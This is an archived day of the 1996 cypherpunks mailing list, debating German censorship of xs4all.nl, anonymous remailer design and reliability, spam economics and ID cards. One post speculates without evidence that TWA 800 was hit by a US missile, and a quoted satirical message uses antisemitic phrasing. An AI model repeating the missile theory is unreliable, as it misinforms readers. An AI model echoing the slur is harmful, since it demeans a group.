From: schmidt at pin.de (Stephan Schmidt)
Date: Mon, 9 Sep 1996 22:00:40 +0800
Subject: ... subversive leftists
In-Reply-To:
Message-ID:

I hope this one was ironic.

> The Democratic People's German Reich is fully justified in cutting off
> contacts with subversive radical publications in Jew-dominated nations like
> Holland.
>
> As Reichskommander Schmidt points out: "The citizen-units who access
     ^^^^^^^^^^^^^^^^^^^^^^^

But this one is tasteless and insulting even if it was meant ironic.

-stephan

From vince at offshore.com.ai Mon Sep 9 07:26:00 1996
From: vince at offshore.com.ai (Vincent Cate)
Date: Mon, 9 Sep 1996 22:26:00 +0800
Subject: TWA 800 - hit by an unarmed US missile?
In-Reply-To:
Message-ID:

A collision with an unarmed missile would explain why they are not finding much evidence of high explosives (the pitting, ruptured metal, and residue).

If a missile going at supersonic speed hit a 747 in the underbelly, near a fuel tank, I sure believe that it could take out the 747. If it was coming toward the 747, not catching up to it from behind, the collision speed would be the addition of the two speeds. In this case a soft civilian airplane would not stand a chance.
Civilian airplanes are designed to survive collisions with birds, but not supersonic missiles.

If the Navy was firing missiles in this area, it really does seem like the press should be checking out this angle.

-- Vince

From jonl at well.com Mon Sep 9 07:33:39 1996
From: jonl at well.com (Jon Lebkowsky)
Date: Mon, 9 Sep 1996 22:33:39 +0800
Subject: [WAS xs4all.nl] Terrorists
Message-ID: <2.2.32.19960909115015.0070caf0@mail.well.com>

At 11:01 AM 9/9/96 +0200, Stephan Schmidt wrote:

>One thought : How many of you would support terrorist
>web server (say Oklahoma, TWA, Iran, Libya, RAF, IRA, ...) ?

I.e. "How many of you support the right to free speech regardless of content."

Wellll...there is the rule about speech which endangers; "fire in a crowded theatre" is the cliche-example. What could a terrorist SAY that would endanger?

Personally, I'd rather have terrorists building html than bombs.

--
Jon Lebkowsky FAX (512)444-2693 http://www.well.com/~jonl
Electronic Frontiers Forum, 6PM PDT Thursdays
"No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky

From jonl at well.com Mon Sep 9 07:59:16 1996
From: jonl at well.com (Jon Lebkowsky)
Date: Mon, 9 Sep 1996 22:59:16 +0800
Subject: Los Angeles Times article on Helsingius and anon.penet.fi
Message-ID: <2.2.32.19960909114613.006ec718@mail.well.com>

At 06:04 PM 9/9/96 +0800, Enzo Michelangeli wrote:
>On Mon, 9 Sep 1996, Gary Howland wrote:
>
>> Enzo Michelangeli wrote:
>>
>> > Perhaps, but defamation is an issue that can't be ignored either,
>> > especially if one tries to build systems based on reputation.
>>
>> It _is_ an issue that can be ignored - if the "defamer" backs up his
>> claims, then fine, the claims can be shown to be valid, otherwise ignore
>> those claims. Simple.
>
>I and you may well choose to do so, but the vast majority of the human
>beings believe just anything that is repeated loud and long enough.
>Otherwise, nobody would hire PR and pay for advertisement, politicians
>wouldn't be fed with taxpayer's money, Bosnians would trade goods instead
>of gunshots, etc. I'm personally not interested in conjuring up the latest
>utopia for a minoritarian sect of illuminati: I need to live in the real
>world, and push for viable solutions that change it for better, now.
>
>Enzo

One viable solution you can push for: educate the 'vast majority' to understand that these wordstreams have no mojo, that skepticism is a survival skill in the 'Information Age.'

--
Jon Lebkowsky FAX (512)444-2693 http://www.well.com/~jonl
Electronic Frontiers Forum, 6PM PDT Thursdays
"No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky

From schmidt at pin.de Mon Sep 9 08:20:06 1996
From: schmidt at pin.de (Stephan Schmidt)
Date: Mon, 9 Sep 1996 23:20:06 +0800
Subject: [WAS xs4all.nl] Terrorists
In-Reply-To: <2.2.32.19960909115015.0070caf0@mail.well.com>
Message-ID:

> Wellll...there is the rule about speech which endangers; "fire in a crowded
> theatre" is the cliche-example. What could a terrorist SAY that would
> endanger?

Hmm most groups gain support and new members ('followers') by 'words'. (Although some may get that by their actions.)

> Personally, I'd rather have terrorists building html than bombs.

Yep, me too, but ....

-stephan

From enzo at ima.com Mon Sep 9 08:20:57 1996
From: enzo at ima.com (Enzo Michelangeli)
Date: Mon, 9 Sep 1996 23:20:57 +0800
Subject: Encourage Singapore To Come Out Of the Stone Age
In-Reply-To: <199609081635.JAA05916@dns1.noc.best.net>
Message-ID:

On Sat, 7 Sep 1996, James A. Donald wrote:

> At 12:39 PM 9/3/96 +0800, Enzo Michelangeli wrote:
> > The idea that rights and values can be "natural" is contradicted by
> > several thousand years of history, during which absolutism or downright
> > tyranny have been well more common than freedom.
> The existence of foot binding in China is not evidence that women's
> feet have no particular natural shape.

Sure, but that was a particular case in the history, not the rule.

> > The success of that misleading view in America, and by extension in most
> > of the western countries, is largely due to the unfortunate influence of
> > [...]
>
> When one engineer's bridge, designed according to one theory of
> materials physics, stands up, and another engineer's bridge, designed
> according to a different theory of material physics, falls
> down, does that not suggest that the first engineer knows
> what he is talking about, and the second engineer does not?

Absolutely: but here the two theories are market economy vs socialism, not political freedom vs. lack of it.

> > In the real world, freedom is a by-product of a materially prosperous
> > society (which is why capitalism generally produces free societies, but
> > socialism does not).
>
> First, you have this completely the wrong way around: Prosperity is
> the product of a free society. For example when the Dutch revolted
> from Spain, they were at first poorer than Spain.
>
> Secondly there is ample counter evidence: For example in America
> before the european conquest, some Indian societies were extremely
> free and others, such as the Incas, had institutions very similar to
> modern totalitarianism, yet their material level was very different
> to today's, and not very different from each others.
>
> Again the Germanic tribes that conquered England had very high levels
> of liberty, yet were terribly poor, and the Icelanders of Saga period
> Iceland were very free, yet very poor.
               ^^^^^^^^^^^^^^^^^^^^^^^^

Er, methinks that those examples strengthen more my thesis than yours: if liberty alone could bring prosperity, how would you explain the cases of those free-but-poor?
In any case, I would stick to periods for which there are reliable written documents and provable evidence, or else we'll end up believing that faith in God may split sea waters, and wars start because of an unfaithful bride.

And I can give you plenty of counter-examples where, instead, industrialization, modern techniques and, crucially, open markets have brought prosperity to politically totalitarian countries that, *subsequently*, have developed more open institutions: Taiwan and Korea, until recently, were more or less ugly fascist dictatorships. China's GDP, since they ditched communism in favor of capit... er, "market socialism", has grown on average about 10% a year: I believe that in 10 or 20 years the consequent increase in education and public awareness will force some form of political liberalization as well (but don't forget that their per-capita GDP is still 30 times lower than Hong Kong's and 10 times than Taiwan's).

Regarding the Habsburg Netherlands, that was very clearly a case of rebellion for economic independence (not unlike the Boston Tea Party, OTOH), and, before that, those provinces witnessed the birth of two modern financial instruments: the tradeable government securities tied to the excise and property tax imposed by Charles V in 1542, and, a few years later in Antwerp, the negotiable international bill of exchange.

> > Trying to build a free society by screaming loud
> > what the "natural" rights are supposed to be, has no better chances of
> > success than [...]
>
> Succeeded the last two times it was tried.

It succeeded where and when liberty symbiosed with capitalism, and failed otherwise.

Enzo

From declan at eff.org Mon Sep 9 08:58:37 1996
From: declan at eff.org (Declan McCullagh)
Date: Mon, 9 Sep 1996 23:58:37 +0800
Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
In-Reply-To:
Message-ID:

Not having any accounts inside Germany, I can only say what I hear from the folks running xs4all, which is that only some ISPs have complied.

-Declan

On Mon, 9 Sep 1996, Stephan Schmidt wrote:

>
> September 9th,
>
> I _can_ _access_ www.xs4all.nl _from_ _inside_ _Germany_.
>
> -stephan
>
> PS: using 3 different routes (accounts).
>
>

// declan at eff.org // I do not represent the EFF // declan at well.com //

From dlv at bwalk.dm.com Mon Sep 9 08:58:55 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 9 Sep 1996 23:58:55 +0800
Subject: [WAS xs4all.nl] Terrorists
In-Reply-To:
Message-ID:

Stephan Schmidt writes:
> One thought : How many of you would support terrorist
> web server (say Oklahoma, TWA, Iran, Libya, RAF, IRA, ...) ?

http://www.terrorist.org ?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From dlv at bwalk.dm.com Mon Sep 9 09:35:08 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Sep 1996 00:35:08 +0800
Subject: TWA 800 - Serious thread.
In-Reply-To:
Message-ID: <56mZTD63w165w@bwalk.dm.com>

"Douglas B. Renner" writes:
> with the investigation. Remember the World Trade Center investigation?
> They knew immediately what type of vehicle the blast was in - but they
> deliberately gave false information to the media. They said they were
> looking into a blue station wagon or some such BS, and the culprits believed
> it! Federal agents staked out the rental agency where the _van_ was rented
> from and caught one of the buggers, who thought the investigation was way
> off track. Yes!!!

I recall that the perp rented the vehicle and gave a $400 cash deposit.
He subsequently returned to the rental agency, stated that the vehicle was stolen, and demanded his cash back. And the Oklahoma City perp was caught speeding with no licence plates. Shit. Whoever recruits those terrorists needs a better h.r. department to screen for stupidity. :-)

> thread is relevant. Fortunately this forum reaches some of the most
> intelligent and well-informed minds on the net.

Why, thank you!

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From peter.allan at aeat.co.uk Mon Sep 9 09:49:54 1996
From: peter.allan at aeat.co.uk (Peter M Allan)
Date: Tue, 10 Sep 1996 00:49:54 +0800
Subject: Job for netescrow ? (was Secure anonymouse server protocol...
Message-ID: <9609091255.AA28353@clare.risley.aeat.co.uk>

Adam and Matt put my casual remark under the grill:

Peter Allan writes on cpunks:
> [Matt Blaze's Oblivious Key Escrow paper]
ftp://ftp.research.att.com/dist/mab/netescrow.ps
>
> This all hinges on a policy to be followed by archive holders defining
> the conditions under which they release their shares.
> This could be receipt of a signed request from the owner (remailer).
>
> Maybe the table relating nyms to reply addresses could be stored in
> netescrow style so that captured remailers reveal nothing. The problem
> of operator coercion is not addressed by this.

Adam:
> Just to clarify, if I understand correctly you are proposing a penet
> style system with the database held in `netescrow'.

Yes. What I had in mind resembled the split list scheme used at a church I used to go to. UK tax law has concessions for regular giving (Covenants, in the jargon) and the church needed to know that commitments were being met. At the same time it was preferred not to know who was giving what.

This was done by having 2 lists eg

        Namelist: Mr J Smith = member 999
        Cashlist: member 999 gives 1000 / month

If member 999 didn't give as planned, cashlist-holder could say to namelist-holder "have a word with 999".
These were held by 2 people, trusted not to collude. Also I suppose committee reshuffles shouldn't put one person straight into the other post.

My idea was to replicate this split list so that

        addrlist: leukos.gleukos at c2.org = index97b6150200000564
        nymlist: index97b6150200000564 = an0001002304000101 at this.remailer

This would be altered for the remailer table as:

        addlist: leukos.gleukos at c2.org = index97b6150200000564
        addlist: an0001002304000101 at this.remailer = index97b6150200400281

and these 2 mappings would be escrowed:

        index97b6150200000564 -> index97b6150200400281
        index97b6150200400281 -> index97b6150200000564

(Or just escrow the _keys_ for the latter, as Matt first thought.)

> However the aim is not to prevent others
> censoring your publicly available writings, but to allow a second
> avenue of access only in the case of `mob cryptography'.

The aim is to prevent a seized remailer having its data read. The "angry mob cryptanalysis" is a side issue.

> If the police are unsuccessful (seems likely) does this offer the
> operator much solace in his jail time for contempt of court, to
> know that he has a vote of confidence in the moral correctness of
> his decision from a population of the net?

> Does it offer him any legal benefit? Are the share holders guilty
> of contempt also, does this lessen his guilt, and harshness of
> prosecution? (Remember that the share holders' identity and
> location are unknown to the operator...

> I'm not sure how useful this part is, unless the possibility of
> `mob cryptography' is the desired feature. I'd have thought an
> individual remailer operator would be more likely to fold than a
> group of anonymous crypto-anarchists.

I did say this didn't address operator coercion. The widespread cross-jurisdiction aspects of netescrow will be important here. Capture of hardware without scope for operator coercion would be protected against - but is an easy problem anyway.

> 2. You could add the twist of an alternative duress key, that would
> stand a real chance of successfully nuking the database. More
> satisfying.

I was thinking of calling this the "shredder ticket" and giving it to the sender (who can then distribute it to all remaining remailers without needing to use the seized one). This would depend on him realising that the remailer was (about to be) seized, and would have to be done before the enemy rounded up the shares.

[Incidentally I'm not that keen on regarding the police as the enemy. My mention of "angry mob cryptanalysis" in the event of a crime was to show that it was not the ideal vehicle for crime. But then maybe I'm a statist pig.]

In any case it would be necessary to

> 3. Negative comment on the system: TLAs have a vested interest in
> themselves being most of the share holders. True of the ownership
> of the current remailers also of course.
>

The widespread cross-jurisdiction aspects of netescrow will be important here. (Perhaps including compulsory cross-border secret reassembly. )

I was envisaging this being combined with Mixmaster. (I see from your Eternity post that you'd run a netescrow scheme that way.) This gives us "vertical integration" a sort of "of the remailers, by the remailers and for the remailers". Careful design of message formats could make it hard to tell the escrow mechanics from the traffic.

To mount this collusion attack the TLAs would have to be part of the scheme - helping to pass most anonymous messages in order to trace some random ones, not necessarily those they want to trace. (If there was nothing in it for them they wouldn't join.)

(Compare that to the current state quoted as near as I can remember from AC2 "It seems reasonable to assume that the NSA can break any message that it intercepts, but not all messages")

It takes time to collect the shares and determine the next destination, during this time the message is sat in a pool.
(Is there scope for traffic analysis in the fact that the average speed of messages will be lower than that of shares ?) With that in mind I was looking at the scope for cheating. Cheating seems possible by: 1) Collusion (as mentioned) 2) Not releasing (valid) shares when requested This can be caught by traps. The list of where the shares went is usually destroyed, but need not be. The shareholders are none the wiser, and when they get known for not releasing shares the remailer excludes them from future share issues. 3) Flooding attacks - storing rubbish in escrow servers who are eventually forced to accept no more shares, or ditch some existing ones. So far as I can see Matt's Netescrow scheme has exactly this problem. Ecash payments might help. If existing shares are ditched the reply-ability will not last long. You might get a message you can reply to for 2 weeks, but no later. Sender might resend periodically - a bit like following up an unanswered snail mail. > At the same time it would provide an argument against GAK, all > legitimate (in the publics eyes, what other opinions count, this is a > democracy isn't it) law enforcement needs met. As in the last sentence or so of the OKE paper. Matt: > My original idea for OKE was as a way to backup long-term, > slow-changing sensitive data without also introducing a single point > of failure for either security or availability. The remailer model is > a bit different, and I'm not sure it's a good fit, in particular > because I haven't thought about the various new failure modes in this > application. But let me think ``out loud.'' > > So can this scheme be improved upon? Is there a better way to run a > persistent-reply-address remailer? These are interesting, and I think > largely open, questions. 
--
Peter Allan peter.allan at aeat.co.uk

From jbugden at smtplink.alis.ca Mon Sep 9 09:57:08 1996
From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca)
Date: Tue, 10 Sep 1996 00:57:08 +0800
Subject: IDC_ard
Message-ID: <9608098422.AA842287223@smtplink.alis.ca>

jya at pipeline.com (John Young) forwarded:
>9-8-96. NYP Mag:
>"The True Terror Is In the Card."
>Faced with rising crime, illegal immigration, welfare
>fraud and absentee parents, many bureaucrats and members
>of Congress insist that the nation would run more
>smoothly if we all had counterfeit-proof plastic
>identity cards.
>http://jya.com/idcard.txt (11 kb)

And to get all the Christian Right (no pun intended) up in arms, just
suggest that the best way to prevent theft of these ID cards would be to
place the information on a microchip and implant it in your body.
Forehead and right wrist preferably.

James

From tank at xs4all.nl Mon Sep 9 10:15:18 1996
From: tank at xs4all.nl (SPG)
Date: Tue, 10 Sep 1996 01:15:18 +0800
Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
In-Reply-To: <2.2.32.19960908184651.00ac63d4@vertexgroup.com>
Message-ID: <32343DEB.7EA7A383@xs4all.nl>

Stephan Schmidt wrote:
>
> September 9th,
>
> I _can_ _access_ www.xs4all.nl _from_ _inside_ _Germany_.
>
> -stephan
>
> PS: using 3 different routes (accounts).

Yes of course. Read this (from press-release xs4all.nl):

Xs4all Internet will rotate the IP-numbering of the website
www.xs4all.nl to ensure that its 3100 userpages will all remain
available for any internet-user.

From raph at CS.Berkeley.EDU Mon Sep 9 10:38:12 1996
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Tue, 10 Sep 1996 01:38:12 +0800
Subject: List of reliable remailers
Message-ID: <199609091350.GAA19806@kiwi.cs.berkeley.edu>

I operate a remailer pinging service which collects detailed
information about remailer features and reliability.
To use it, just finger remailer-list at kiwi.cs.berkeley.edu

There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

For the PGP public keys of the remailers, finger
pgpkeys at kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

This is an automatically generated listing of remailers. The first
part of the listing shows the remailers along with configuration
options and special features for each of the remailers. The second
part shows the 12-day history, and average latency and uptime for each
remailer. You can also get this list by fingering
remailer-list at kiwi.cs.berkeley.edu.

$remailer{"extropia"} = " cpunk pgp special";
$remailer{"c2"} = " eric pgp hash reord";
$remailer{"penet"} = " penet post";
$remailer{"flame"} = " cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = " cpunk mix";
$remailer{"amnesia"} = " cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = ' alpha pgp';
$remailer{'nymrod'} = ' alpha pgp';
$remailer{"lead"} = " cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = " cpunk pgp hash latent cut";
$remailer{"exon"} = " cpunk pgp hash latent cut ek";
$remailer{"vegas"} = " cpunk pgp hash latent cut";
$remailer{"haystack"} = " cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = " mix cpunk pgp hash latent";
$remailer{"lucifer"} = " cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = " cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = " cpunk pgp hash cut ksub reord";
$remailer{'nym'} = ' newnym pgp';
$remailer{"balls"} = " cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = " cpunk mix pgp hash latent cut ek";
$remailer{"middle"} = " cpunk mix pgp hash middle latent cut ek reord";
$remailer{'cyber'} = ' alpha pgp';
$remailer{"dustbin"} = " cpunk pgp hash ksub latent cut ek mix reord";
catalyst at netcom.com is _not_ a remailer.
lmccarth at ducie.cs.umass.edu is _not_ a remailer.
usura at replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(cyber mix)

The alpha and nymrod nymservers are down due to abuse. However, you
can use the cyber nymserver.

The nym.alias.net server will be listed soon. See
http://www.cs.berkeley.edu/~raph/n.a.n.html for details.

403 Permission denied errors have been caused by a flaky disk on the
Berkeley WWW server. Hopefully, this is fixed by now.

The penet remailer is closed.

Last update: Mon 9 Sep 96 6:45:23 PDT
remailer email address                   history      latency  uptime
-----------------------------------------------------------------------
jam      remailer at cypherpunks.ca      +**+********   18:19  99.99%
mix      mixmaster at remail.obscura.com ++++++++++++ 1:04:20  99.98%
exon     remailer at remailer.nl.com     +*******#**#    1:51  99.98%
squirrel mix at squirrel.owl.de          --.++++-+++  1:54:34  99.97%
replay   remailer at replay.com          +*** *+*****    5:02  99.83%
amnesia  amnesia at chardos.connix.com   +----------  3:22:14  99.78%
balls    remailer at huge.cajones.com    +***********    5:08  99.75%
cyber    alias at alias.cyberpass.net    +*+*+*+* ***   27:34  99.47%
lead     mix at zifi.genetics.utah.edu   ++++++++ -++ 1:00:20  99.36%
dustbin  dustman at athensnet.com        -+*          2:46:09  98.70%
middle   middleman at jpunix.com         --+++++ --   1:08:18  98.27%
haystack haystack at holy.cow.net        +### #*####     3:19  95.26%
extropia remail at miron.vip.best.com    ----------   4:55:16  94.74%
winsock  winsock at c2.org               -+--------   3:14:43  91.19%
nemesis  remailer at meaning.com         +*******       24:33  57.62%

History key
* # response in less than 5 minutes.
* * response in less than 1 hour.
* + response in less than 4 hours.
* - response in less than 24 hours.
* . response in more than 1 day.
* _ response came back too late (more than 2 days).

cpunk
    A major class of remailers. Supports Request-Remailing-To: field.
eric
    A variant of the cpunk style. Uses Anon-Send-To: instead.
penet
    The third class of remailers (at least for right now). Uses
    X-Anon-To: in the header.
pgp
    Remailer supports encryption with PGP. A period after the keyword
    means that the short name, rather than the full email address,
    should be used as the encryption key ID.
hash
    Supports ## pasting, so anything can be put into the headers of
    outgoing messages.
ksub
    Remailer always kills subject header, even in non-pgp mode.
nsub
    Remailer always preserves subject header, even in pgp mode.
latent
    Supports Matt Ghio's Latent-Time: option.
cut
    Supports Matt Ghio's Cutmarks: option.
post
    Post to Usenet using Post-To: or Anon-Post-To: header.
ek
    Encrypt responses in reply blocks using Encrypt-Key: header.
special
    Accepts only pgp encrypted messages.
mix
    Can accept messages in Mixmaster format.
reord
    Attempts to foil traffic analysis by reordering messages. Note:
    I'm relying on the word of the remailer operator here, and haven't
    verified the reord info myself.
mon
    Remailer has been known to monitor contents of private email.
filter
    Remailer has been known to filter messages based on content. If
    not listed in conjunction with mon, then only messages destined
    for public forums are subject to filtering.

Raph Levien

From michael.tighe at Central.Sun.COM Mon Sep 9 11:10:11 1996
From: michael.tighe at Central.Sun.COM (Michael Tighe SUN IMP)
Date: Tue, 10 Sep 1996 02:10:11 +0800
Subject: TWA 800 - Serious thread.
In-Reply-To: <56mZTD63w165w@bwalk.dm.com>
Message-ID: <199609091434.JAA09142@jeep.Central.Sun.COM>

Dr.Dimitri Vulis KOTM writes:

>I recall that the perp rented the vehicle and gave a $400 cash deposit.
>He subsequently returned to the rental agency, stated that the vehicle
>was stolen, and demanded his cash back. And the Oklahoma City perp was
>caught speeding with no licence plates.

>Shit. Whoever recruits those terrorists needs a better h.r. department to
>screen for stupidity. :-)

No, actually they are doing an outstanding job of finding a bunch of
useful idiots to do the dirty work for them. And of course, serving them
up to law enforcement for punishment, while they remain behind the scenes.

From tcmay at got.net Mon Sep 9 11:17:56 1996
From: tcmay at got.net (Timothy C. May)
Date: Tue, 10 Sep 1996 02:17:56 +0800
Subject: China joins Singapore, Germany, ....
Message-ID:

CNN is presenting coverage of China's decision to pull the plug on more
than 100 sites, and issuing a list of sites which are illegal to connect to.

(Net censorship is getting to be a big story....when the list of countries
reaches 15, it will of course no longer be news.
And when the United States block access, this will all be transmogrified
into an "Anti-Terrorist Action.")

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From fletch at ain.bls.com Mon Sep 9 11:57:17 1996
From: fletch at ain.bls.com (Mike Fletcher)
Date: Tue, 10 Sep 1996 02:57:17 +0800
Subject: Conservation Laws, Money, Engines, and Ontology (fwd)
In-Reply-To: <9609061904.AA00879@ch1d157nwk>
Message-ID: <9609091508.AA04357@outland>

> Donald Eastlake writes:
> > I don't think any one step will solve all our spam problems
> > but I wouldn't mind spending, say, 5 cents for each real piece
> > of mail I sent outside my company and if end machines charged
> > 5 cents per piece of outside mail received, I think spamming
> > would be crippled. (Note that with bad guy lists, you could
> > collect the money and then just throw away the mail.)
>
> So would you be willing to pay $50.00 for this message you sent to
> cypherpunks? If there are a thousand recipients and each one charges $0.05
> for the privilege of you sending it e-mail.... It seems like such a scheme
> would not only cripple spam, but public discussion lists like this one.

A better solution might be pay $whatever to be allowed to post to the
list. Nothing is charged for receiving mail from the list, but you have
to ante up to join in the discussion. If someone spams (spam being
defined up front and communicated to all list members) then their
posting priv's are revoked.
Then you can charge for receipt of mail normally yet still have
(relatively) open lists for discussion.

---
Fletch                                                      __`'/|
fletch at ain.bls.com  "Lisa, in this house we obey the      \ o.O'   ______
404 713-0414(w)       Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43   U      ------

From kamml at secret.org Mon Sep 9 12:18:23 1996
From: kamml at secret.org (kamml at secret.org)
Date: Tue, 10 Sep 1996 03:18:23 +0800
Subject: What is the EFF doing exactly?
In-Reply-To:
Message-ID:

>>
>> Try & mail an anonymous FedEx package.
>
>Just lie on the sender label, isn't that obvious? I know people who
>actually use "codeword" sender labels, in case FedEx or federales ask
>about a package they can tell by the sender mentioned which to disavow :)
>

Obvious if you can pay anonymously.

>> Try and pay cash in most Fedex offices.
>
>I always do and as long as I have exact change I have never been
>hassled.
>

Fedex will not accept cash in New York City. I have tried to pay cash and
been refused. I have talked to customer service and confirmed that they
will not accept cash in NYC although they will elsewhere.

From bgamble at wo0033wp.wo.blm.gov Mon Sep 9 12:27:59 1996
From: bgamble at wo0033wp.wo.blm.gov (Barbara Gamble)
Date: Tue, 10 Sep 1996 03:27:59 +0800
Subject: Test...sorry about this - Reply
Message-ID:

I got it too. And since I am a new subscriber, I thought it might be the
normal traffic. The Welcome msg *did* say the list is high-traffic.
Still, I was aghast--300 all at once, another 100 just in the last hour.
Is that typical? (Please forgive such a question from a newcomer to the
list.)

>>> Z.B. 09/06 10:38 am >>>
I'm just posting this to see if there's something wrong with my mail
filter - it dumped a ton of messages from this list over the night, and
I'm trying to figure out why the !@%$# it did that. Sorry for the
interruption.
---
Zach Babayco
zachb at netcom.com <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127

From tcmay at got.net Mon Sep 9 12:30:43 1996
From: tcmay at got.net (Timothy C. May)
Date: Tue, 10 Sep 1996 03:30:43 +0800
Subject: Conservation Laws, Money, Engines, and Ontology
Message-ID:

At 4:03 AM 9/9/96, Greg Kucharo wrote:
> One thing that occurs here. I imagine a scenario where you have a
>"share" of resources on a system(and ISP for example). You're metered as
>to how much you can post or store. Actually as it is now posting is
>regulated through extra payments per meg above the limit. Spam is being
>somewhat regulated by Terms of Service type things, but my point is what is
>to prevent pooling resources among several system to achieve the same Spam
>pursuits some have. Say for example that an individual gets several
>accounts to balance the load at their point. The Usenet for example has no
> "choke point". How could ISP's apply conservation here? If you limit the
>amount of traffic you still aren't holding back the flow of "spam".
> Here's where reputations could come in. You couldn't open a new account
>anywhere without a good "reputation". This could aid in balancing the load
>of certain people.

The most basic principle is this: those with resources they control (and
"own") set the rates and policies. We don't have to figure out how the
pricing will ripple down the line, or whether what some call "spam" will
be controlled.

(My view is that the whole focus on "spam" has been singularly unfruitful.
We don't call magazine or television advertising "spam," though it meets
operational definitions of spam, or velveeta, or whatever the latest term
is. While much advertising is disgusting, unwanted, noisome, etc., we
understand that the publisher of a magazine can choose what to include and
we can choose whether to buy it or not.
(Television and radio are somewhat different, due to the FCC licensing and
limited bandwidth, but the principle is the same.))

Thus, when carriers of packet traffic begin market pricing of packets, the
pricing will ripple back. Eventually. (Or not, should some steps in the
chain decide not to pass on costs...)

I expect the failure of the Internet to have proper conservation laws to
be solved in this way:

  Removal of Market Distortions
+ Auctioning Mechanisms
+ Several Large Network Crashes
= A More Rational Market Model for Network Usage

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From tcmay at got.net Mon Sep 9 12:38:53 1996
From: tcmay at got.net (Timothy C. May)
Date: Tue, 10 Sep 1996 03:38:53 +0800
Subject: Conjuring up the latest utopia for a minoritarian sect of illuminati
Message-ID:

At 10:04 AM 9/9/96, Enzo Michelangeli wrote:

>I and you may well choose to do so, but the vast majority of the human
>beings believe just anything that is repeated loud and long enough.
>Otherwise, nobody would hire PR and pay for advertisement, politicians
>wouldn't be fed with taxpayer's money, Bosnians would trade goods instead
>of gunshots, etc. I'm personally not interested in conjuring up the latest
>utopia for a minoritarian sect of illuminati: I need to live in the real
>world, and push for viable solutions that change it for better, now.

Yes, Bosnians and Serbs would not be killing each other if only they could
receive government-approved information!
(Hint: This shows that neither governments nor churches nor the United
Nations knows any better solutions to the "who do you trust" problem. And,
I believe, mostly governments and other such entities exist to serve their
own interests.)

As to what I presume is an insult to the folks on this list ("I'm
personally not interested in conjuring up the latest utopia for a
minoritarian sect of illuminati"), you know where the exit is.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From tcmay at got.net Mon Sep 9 12:43:07 1996
From: tcmay at got.net (Timothy C. May)
Date: Tue, 10 Sep 1996 03:43:07 +0800
Subject: Voluntary Disclosure of True Names
Message-ID:

At 11:18 AM 9/8/96, James A. Donald wrote:
>At 10:49 AM 9/5/96 -0700, Vladimir Z. Nuri wrote:
>> I have seen it repeated here often that somehow anonymity is some kind
>> of a "right" that one should have in all kinds of different & important
>> transactions, not merely on "cyberspace debate societies". I see
>> here frequently the implication that *private*entities* that want to
>> enforce identity in their own transactions are somehow implementing
>> a corrupt, orwellian system.
>
>We hold that private entities have the right to attempt to impose corrupt
>orwellian systems provided they do not do it at gunpoint, but we doubt
>that they will succeed without guns.

An overstatement which diminishes the power of your arguments.
Namely, many, many corporations have Orwellian surveillance systems and
policies which would be unacceptable if imposed by a government. No guns
are involved, only the considerations of employment, paychecks, and the
like.

Likewise, many private schools have such systems. Likewise, no guns are
involved.

And so on.

(Naturally, I am not criticizing these voluntarily-entered-into
arrangements, merely rebutting the point that people will generally not
put up with Orwellian schemes unless threatened with guns.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

